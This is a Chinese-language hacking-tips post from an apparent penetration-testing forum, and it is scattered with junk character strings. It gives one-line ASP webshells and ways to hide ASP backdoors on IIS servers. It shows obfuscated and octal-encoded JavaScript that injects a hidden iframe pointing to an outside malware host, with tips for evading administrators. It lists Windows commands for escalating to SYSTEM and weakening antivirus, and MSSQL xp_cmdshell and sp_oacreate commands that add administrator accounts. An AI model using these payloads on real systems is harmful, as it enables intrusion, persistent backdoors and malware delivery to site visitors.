c).%><%execute request("go")%><%6 H1 w& Q+ H; ~1 E& g1 v) P3 l
d).<script language=VBScript runat=server>execute request("sb")</Script>5 w- c# O1 Z9 e  x
e).<%25Execute(request("l"))%25>
4 D' ?. I3 U. V+ R0 A6 p% M! V; y; Uf).<%if request("cmd")<>"" then execute request("pass")%>' {: t5 Z; E! `& \, F

# z9 y. w7 Y; l* e) z6 ]! @, g52、at "12:17" /interactive cmd
0 R3 _5 Y* q! X3 C执行后可以用AT命令查看新加的任务" e; c) ^  }- P* Z+ k* z1 G/ l) j
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。+ a8 c  m' }: f# t! u/ A! Q
6 `9 i/ g0 r& }* F' Z1 c1 u
53、隐藏ASP后门的两种方法9 A/ N' ?7 ]% x+ l6 C& @; w
1、建立非标准目录:mkdir images..\
6 ~2 g$ ]. d6 g# X0 c& }拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp  d5 g" A$ d' I  W6 d* |
通过web访问ASP木马:http://ip/images../news.asp?action=login
9 h% z: k( b7 }: |, T如何删除非标准目录:rmdir images..\ /s
8 I$ h2 H8 e6 p% t1 \. |0 N2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* ?. H. I: [: Q" Cmkdir programme.asp
' ~" R3 q$ }  \- M' V- d9 y新建1.txt文件内容:<!--#include file=”12.jpg”-->
8 r2 x& A; D6 @3 X新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! w. ?0 G6 J% d; Y
attrib +H +S programme.asp9 _  ~# j4 z0 q, |& F+ J
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
) Q/ G* R! l7 z: ~* M5 B
0 V4 S: J! N7 {& ~* z" W4 w54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。' {3 V; j! m& w/ e9 a. D5 r' T/ j
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。; S; V: {3 Z6 \$ @8 F

9 J5 Y. L+ E* V+ F' S1 Z/ Q55、JS隐蔽挂马& {4 [& V, d% c
1.1 X7 `5 F6 H, w1 Y+ P3 m7 q
var tr4c3="<iframe src=ht";+ h. m! ]/ B! ^5 l) g
tr4c3 = tr4c3+"tp:/";
$ }& ~0 [) `9 o- c7 N; \2 |; ^tr4c3 = tr4c3+"/ww";8 D9 {$ S+ X( s' \0 F
tr4c3 = tr4c3+"w.tr4";* C6 U- F- m7 f( F. c# u+ h
tr4c3 = tr4c3+"c3.com/inc/m";% r5 c; E9 v9 V; g0 p% J
tr4c3 = tr4c3+"m.htm style="display:none"></i";
8 P" o7 @' T( q; P+ U9 O, Xtr4c3 =tr4c3+"frame>'";
7 |' ?/ ~' p' i' Q' X% k4 K  p1 sdocument.write(tr4c3);
/ t' ?  _9 q- q3 n避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 l* v" Q% @3 M, o6 c  o
8 S, W) z  O9 K, c1 w: o2.
  U# v# _* y0 z* `; H转换进制,然后用EVAL执行。如
, d% @4 v4 N( ]) N0 o& U) |eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
$ W4 B' W. U; t4 u) x' k) b不过这个有点显眼。
$ g4 S! @; c/ z( h; D8 s3.' L, `" W4 \+ G) i
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');' y3 }- X' Q  D" H2 b, o# A% m
最后一点,别忘了把文件的时间也修改下。
& }% j8 J" G$ t
- y5 e; d! o) ^8 I56.3389终端入侵常用DOS命令
. @" B! ?# B. |" M# Ptaskkill taskkill /PID 1248 /t
/ m) h6 D. `8 H' Q2 {4 |( P5 l6 E- w8 g5 R+ d; Q
tasklist 查进程
7 I1 R: K3 Z; P
# y  Y7 u$ a* E9 b! d% p8 s& T) v( Wcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限: v; ~, L% c/ `6 t1 w% V
iisreset /reboot
$ `$ c$ ?' o0 y# O6 a7 O; Xtsshutdn /reboot /delay:1    重起服务器3 M0 Y2 }; w2 t' y9 ?6 t9 b
& S. Q$ b8 ^! b! ~- R  e; o& m$ A9 H# f
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,% x( `) Q( J3 |* S0 k
  a! R2 h  B! Z! I" [
query user 查看当前终端用户在线情况% s) L, G. P% ]6 D
5 Q9 I) {8 m# e, d) h
要显示有关所有会话使用的进程的信息,请键入:query process *
6 ^9 P# o5 {: A' @$ x$ b* U3 i/ t1 e  \, q0 X2 z  p" r; }$ c
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
- Q; r6 |! l1 r! A
. O/ w6 @' G% G' e! J, }要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2+ \9 ~( l; @- _6 q  p# ~
2 y& h' h% Z) k1 t4 e, B6 G1 L
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM021 d6 d. U6 A" y

$ I5 b  @2 A3 @; T% C0 X/ T2 o命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
7 T# l/ ]3 V% @
  m) l. T2 i6 d  s命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
& K" p9 Q1 E+ I+ s+ V0 p  Q! R8 e+ o$ g' C  _+ V
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 F9 V6 B) x: |5 B3 r( f0 w3 v$ U' y
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机5 E3 Q$ B' P# K9 o* u+ g

: [6 N9 V  \8 r56、在地址栏或按Ctrl+O,输入:
/ ]. V* c6 U0 A. ]4 M  R8 sjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
- R% g* R( S$ N2 C7 I% `; L9 r+ q8 r
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
4 V$ f" k# Y4 H; m3 e3 D! t, }; k- n# H( y
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,0 H% B4 d; ]) b" _& R7 Y# C' m# T
用net localgroup administrators是可以看到管理组下,加了$的用户的。
# L) z- X, w$ i% X! m7 U- q) E) i6 \8 r: d
58、 sa弱口令相关命令% M$ n/ `6 b# G

! `$ v' o; h3 J& ^  }$ |! R6 t. _一.更改sa口令方法:
" c& U1 U+ `7 F用sql综合利用工具连接后,执行命令:* `  u9 O# K. U$ M& H; r. t; o+ I
exec sp_password NULL,'20001001','sa'
- L6 T. A# P0 O(提示:慎用!)
/ |0 B) v9 ?" V5 G( a- E  z0 D  P% |. \: q3 z! j
二.简单修补sa弱口令.
- {8 W) X* m7 c/ {) n+ u
" r7 F$ M4 h+ [2 W6 A方法1:查询分离器连接后执行:( G/ p: `0 _/ z  M2 Z# ?8 ^8 A% R
if exists (select * from! B/ T* U7 w' [4 M
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and# J; X+ ~4 e$ g
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)- C* |! I& @3 ?; {7 f& e- L7 |

/ S9 J* \) c% m# e5 B8 h4 m8 z( Rexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'8 L: h) f& ~* o
0 |. j7 [; E, a5 e1 L
GO
8 \/ @2 e, k$ `: B4 J
' S; Z: d" {& u. t然后按F5键命令执行完毕
9 {8 i/ J/ M. o- y/ ]8 ^9 N! I  z7 ^
方法2:查询分离器连接后; J4 y4 @: d$ t- ], |, s: C
第一步执行:use master
- Q& z4 p: Y& w第二步执行:sp_dropextendedproc 'xp_cmdshell'% B5 `4 m1 |& Q! h% ?9 X4 t
然后按F5键命令执行完毕# b; [' V1 E: R; E7 Q
, B3 r& D$ X. `( z* q

0 u1 t4 ^2 [) d, Z4 I三.常见情况恢复执行xp_cmdshell.
1 @5 c$ R* h, i/ y( e  e
; M8 j: Y# H  U6 e! ~. y
8 f0 q1 r' K$ z! Y+ M' L) ?: m3 M1 未能找到存储过程'master..xpcmdshell'.
  t5 o. H7 d4 X1 @/ A1 t   恢复方法:查询分离器连接后,4 I& {" f6 |3 l1 P' U; e+ U
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
/ `$ C% C0 [5 ?4 |7 k; I第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'; d# G: R" E- J# m- E
然后按F5键命令执行完毕' Y+ C' ]5 l5 e: J6 Z/ X% T
3 F- K1 U+ }% R
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
4 m3 R( H4 E# h; n6 \6 X恢复方法:查询分离器连接后,, P+ t7 s3 w. U
第一步执行:sp_dropextendedproc "xp_cmdshell"
7 ~2 q' U" B* L' u第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 B% l# R' A7 K8 q9 o! W7 C9 B然后按F5键命令执行完毕
% _% l2 l3 b* _6 T. P" R3 T) ]
3 z7 J& e$ a7 D1 f0 l; {& u3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)# ~/ \3 L+ N" c: r$ W
恢复方法:查询分离器连接后,. @3 Q2 O2 V0 K! z
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: V( ~& j+ H, f第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
) S3 h) g% S. F然后按F5键命令执行完毕
. R, t1 C( a8 l6 k4 Y6 A( P* k! ^
4 I0 L- C. B3 r$ Q/ P7 g( N- m/ y四.终极方法.
4 J' x0 h9 h3 O2 R8 z" ]" \如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
9 ?0 i& ~! x& ~4 }/ Z  y查询分离器连接后,+ l; y. g7 Z. {( R. O
2000servser系统:  \4 b; ~2 N( x: y! P/ T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'- s8 P% I, }2 H, g$ g7 h7 E
1 M3 Q( b! }( g% t* O
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
% i3 C( u: A+ o" z2 W' L# T4 l) A+ L$ l. o5 T2 F7 b  t! C8 H1 o' e# E5 s  c
xp或2003server系统:
8 J4 y* E6 B+ i; @
3 u# c- k' J& I( a% S9 f5 A. D! Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'5 x. `( |/ v0 m# h. Q

- s# u- B/ h8 w: e, v1 U0 {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'( `4 s. z8 L% z5 c





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2